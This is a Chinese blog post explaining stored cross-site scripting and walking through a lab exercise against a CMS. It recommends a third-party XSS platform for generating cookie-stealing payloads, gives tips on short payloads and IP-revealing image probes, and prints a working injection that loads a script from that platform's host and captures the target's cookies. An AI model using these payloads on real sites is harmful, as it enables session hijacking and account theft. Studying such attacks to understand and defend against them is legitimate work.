存储型XSS简介

已于 2023-05-05 09:08:57 修改
阅读量1.7w 收藏 35
点赞数 5
分类专栏: WEB安全 文章标签: xss web安全 安全
于 2022-05-05 16:36:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64551911/article/details/124591051
版权

文章目录

一、存储型XSS简介

(一)存储型XSS的概念

存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种攻击方式需要一点骗术,所以这种攻击范围不是特别的广,并且提交漏洞时要么平台不认,要么会被认定为低危漏洞。
存储型XSS可以采用广撒网的方式,就是攻击者将存储型XSS代码写进一些有XSS漏洞的网站上,只要有用户访问这个链接就会自动中招。所以我们可以看出,存储型XSS的危害性更大,范围更广,可以不需要寻找被攻击对象,只要存储型XSS在服务器上就能实施攻击。所以提交的存储型XSS评级一般为中危漏洞。

(二)存储型XSS攻击过程

这种攻击多见于论坛、博客和留言板。攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。随着帖子被服务器存储下来,恶意脚本也永久地被存放在服务器的后端数据库中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本会在他们的浏览器中得到触发。
例如,攻击者在留言板中加入以下代码:

<script>alert(1)</script>)

这样当其他用户访问留言板时,就会看到一个弹窗。可以看到,存储型XSS的攻击方式能够将恶意代码永久地存入数据库或者文件中,相当于将代码嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射型XSS攻击将没有多大作为,而存储型XSS则不同,由于它注入在一些我们非常信任的页面中,因此无论我们多么小心,都难免会受到攻击。

(三)打XSS的潜在风险

用前台打后台有可能会把页面插崩,所以在没有明确书面授权的情况下,最好是谨慎去做。正常情况下XSS不会把页面搞崩,比如像这样主动把标签闭合掉<script></script>一般就不会把网页插崩,但是只插入<script>就有可能会崩。
而且在打XSS时,如果前台没有过滤的信息,基本上后台也不会过滤了。

二、XSS平台使用方法

由于XSS的payload构建起来比较复杂,所以一般情况下我们都是使用XSS平台自动生成payload去获取cookie,建议用隐私模式去访问,天知道平台有没有恶意代码。如果想自己搭建平台的话,需要确保发送方能找到你(也就是首先要有一个公网ip)。
在XSS平台中,前辈们已经把要用到的js代码都集成在平台上了。XSS平台可以很好的拿cookie,但是平台管理者想拿走你的cookie也是轻而易举的。有些XSS平台很贴心,有邮件和短信提醒你cookie要过期了。
那么如何获取XSS平台呢?可以百度直接搜素XSS平台,也可以直接在这个平台:http://101.43.103.25/xsser/,建议用隐私模式去注册账号。以这个平台为例:
首先进入XSS平台,然后注册一个账号并登陆。


看到主界面有很多的模块,最常用的是基础默认模块和超强模块。
超强模块中,keepseesion参数是指保持会话,每隔一段时间会自动向目标网站发包,相当于告诉网站,我还在线,请保持cookie的时效性。


注意:图片探测功能虽然不能偷cookie,但是可以偷对方的真实ip。
有些网站会限制文本框的输入长度,因此XSS的payload最好的越短越好。
如果没有长度限制,先打传统的payload,有长度限制再打这种短的。如果别的都打不了,就尝试打图片探测。运气好说不定能获得目标网站的后台登陆页面呢。
对于输入信息执行后,该信息若消失不见,很有可能是被当成代码解析了,XSS生效。在注册用户的用户名那里往往很容易存在XSS,甚至上传文件的文件名,也能拿来打XSS。
作为网站管理者,按F12进入检查页面,在来源那里如果看到一个未知的域名,则往往存在攻击者传来的XSS。

三、靶场实战

说了那么多,当然要实战一下了!首先进入靶场:


在靶场底部看到了该cms的版本号,因此去百度搜索该cms的通杀漏洞:

看到一个存储型XSS漏洞,通过查看该文章了解该漏洞的利用过程,然后去靶场复现。为了避免谷歌浏览器的安全机制导致漏洞复现失败,因此改用火狐浏览器去操作。在浏览器中输入:

http://59.63.166.75:8082/index.php?c=m&m=a <script>alert(1)</script>

在这里插入图片描述
成功弹窗。
实际上这里的c和m的值怎么填都可以,但是传参名得是c和m,具体是为什么,我也不清楚,这肯定是跟源码的代码审计有关了。我们只要知道怎么用就行了。
复制XSS平台生成的攻击代码,插入到网址后面,如下:

http://59.63.166.75:8082/index.php?c=m&m=a </textarea>'"><script src=http://101.43.103.25/xsser/r1AsOY></script>

在这里插入图片描述
看到收到了目标网站的cookie信息。

Mr.95
关注
专栏目录
存储XSS
weixin_45634365的博客
03-07 2637
一、XSS简介 XSS:用户输入的数据被当做代码执行 #JS代码被触发的三种情况 <script></script> <a herf=javascript:alert(1)></a> <img src=1 onerror=alert(1) /> XSS的三种类: (1)反射 (2)存储 (3)Dom 二、同源策略 浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本
存储xss_安全测试之XSS
weixin_39989159的博客
11-29 1663
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
XSS | 存储 XSS 攻击
最新发布
Blue17 の 小窝
09-30 1770
从上面的攻击流程中,我们可以看到,存储 XSS 的攻击方式能将恶意代码永久的嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射 XSS 攻击将没有多大作为,而存储 XSS 则不同,由于它注入在一些我们信任的页面,因此无论我们多么小心,都难免会受到攻击(谁会一直打开浏览器的源码模式抓包呀)。从上图可以看出来,使用不同的浏览器,在不同的时刻去查看之前的留言,都是能看到相同的内容的。表单,将数据传递给后端,后端接收到用户的数据后,使用自己编写的。
XSS跨站脚本安全漏洞防护
Zyw907155124的博客
06-05 1932
存储XSS是指应用程序通过Web请求获取不可信赖的数据,并且在未检验数据是否存在XSS代码的情况下,将其存入数据库。存储XSS可以持续攻击用户,在用户提交了包含XSS代码的数据存储到数据库后,每当用户在浏览网页查询对应数据库中的数据时,那些包含XSS代码的数据就会在服务器解析并加载,当浏览器读到XSS代码后,会当做正常的HTML和JS解析并执行,于是发生存储XSS攻击。如果address的值是由用户提供的,且存入数据库时没有进行合理的校验,那么攻击者就可以利用上面的代码进行存储XSS攻击。
存储 XSS 攻击演示(附链接)
Flag少侠的博客
01-23 1584
存储 XSS 攻击演示(附链接)
XSS存储xss
wwwwyyyrre的博客
06-17 3385
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射XSS编写一次代码只能进行一次攻击的特点,存储XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久XSS”。存储XSS比反射XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
XSS-存储
qq_39416206的博客
03-14 479
一、知识点 同源策略: 所谓同源:需要同 域名/host、端口、协议 存储xss是什么 提交恶意xss数据,存入数据库中,访问时触发。 存储xss可能出现的位置 可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息 获取到别人的Cookie怎么登陆别人用户 可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器 存储XSS怎么预防? XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.
xss存储
xu_1234567的博客
11-04 4810
1.存储xss原理 存储xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
存储xss
weixin_42576186的博客
12-26 409
存储XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它指的是攻击者往Web应用程序中注入恶意代码,被存储在服务器端,当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。 存储XSS攻击通常发生在用户留言板、论坛和博客等功能中,攻击者可以在留言板中发布带有恶意代码的留言,当其他用户浏览留言板时就会受到攻击。存储XSS攻击也可能发生在用户提交表单时,如果Web应用程...
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
YXcms-含有存储XSS漏洞的源码包
03-17
"YXcms-含有存储XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常...
E069-web安全应用-存储XSS的场景实践.pdf
12-02
E069-web安全应用-存储XSS的场景实践 本资源讲解了存储XSS(Cross-Site Scripting)的攻击场景实践,通过DVWA(Damn Vulnerable Web Application)平台来演示整个攻击过程。 知识点1:存储XSS的定义和原理 ...
DVWA-XSS (Stored)-存储XSS
seanyang_的博客
06-12 2447
跨站点脚本 (XSS)”攻击是一种注入问题,其中恶意脚本被注入到原本良性和受信任的网站上。当攻击者使用 Web 应用程序发送恶意代码(通常以浏览器端脚本的形式)时,就会发生 XSS 攻击, 给其他最终用户。允许这些攻击成功的缺陷非常普遍,并且发生在使用输出中用户输入的Web应用程序的任何地方, 无需验证或编码。攻击者可以使用 XSS 向毫无戒心的用户发送恶意脚本。最终用户的浏览器无法知道脚本不应该被信任, 并将执行 JavaScript。
网络安全存储XSS
垃圾管理员的垃圾站
09-08 7097
书接上文(有没有一种熟悉的味道),来看存储XSS,这个最常见,也最好理解。 数据库里的一条数据显示了出来。 我们输入一些东西,下方又会多出来一条数据: 如果重新加载页面,仍旧有这两条数据。这就是存储,输入数据会被存入数据库,网页每次被打开,都会从数据库里调出显示。 这个像什么?对,就是我们文章下面的评论系统,文章所有的评论会被存进数据库,每一个浏览...
存储 XSS
weixin_33777877的博客
10-09 310
存储XSSXSS***的用处JS-Context存储XSS:1、&lt;/script&gt;闭合当前脚本,然后输入自定义内容。过滤&lt;,&gt;,/替换&lt;/script&gt;为&lt;/’+’script&gt;(网易邮箱)2、根据JS上下文,构造正确的闭合。根据实际情况,进行过滤。通常输出是字符串,在’和"之间,过滤’,"即可和&lt;script&gt;中的XSS一样,过滤’...
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值